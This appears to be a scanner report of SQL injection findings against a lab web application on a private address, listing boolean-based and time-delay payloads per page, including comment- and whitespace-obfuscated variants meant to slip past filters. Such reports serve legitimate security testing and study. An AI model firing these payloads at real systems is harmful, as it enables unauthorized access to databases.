Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'35575'='35575
'	and	'83258'='83258
'	or	12780=12780#
'	and	'95758'='95759
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'35575'='35575
'	and	'83258'='83258
'	or	12780=12780#
'	and	'95758'='95759
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'82845'='82845
'/**/and/**/'76868'='76868
'/**/or/**/4702=4702#
'/**/and/**/'76476'='76477
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	32711=32711
	and	10056=10056
	or	33268=33268#
	and	3854=3855
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	32711=32711
	and	10056=10056
	or	33268=33268#
	and	3854=3855
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	32711=32711
	and	10056=10056
	or	33268=33268#
	and	3854=3855
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
31230=31230

and
32420=32420

or
97777=97777#

and
62694=62695
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'5523'='5523
'+and+'49257'='49257
'+or+41511=41511#
'+and+'61509'='61510
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'35575'='35575
'	and	'83258'='83258
'	or	12780=12780#
'	and	'95758'='95759
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'35575'='35575
'	and	'83258'='83258
'	or	12780=12780#
'	and	'95758'='95759
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---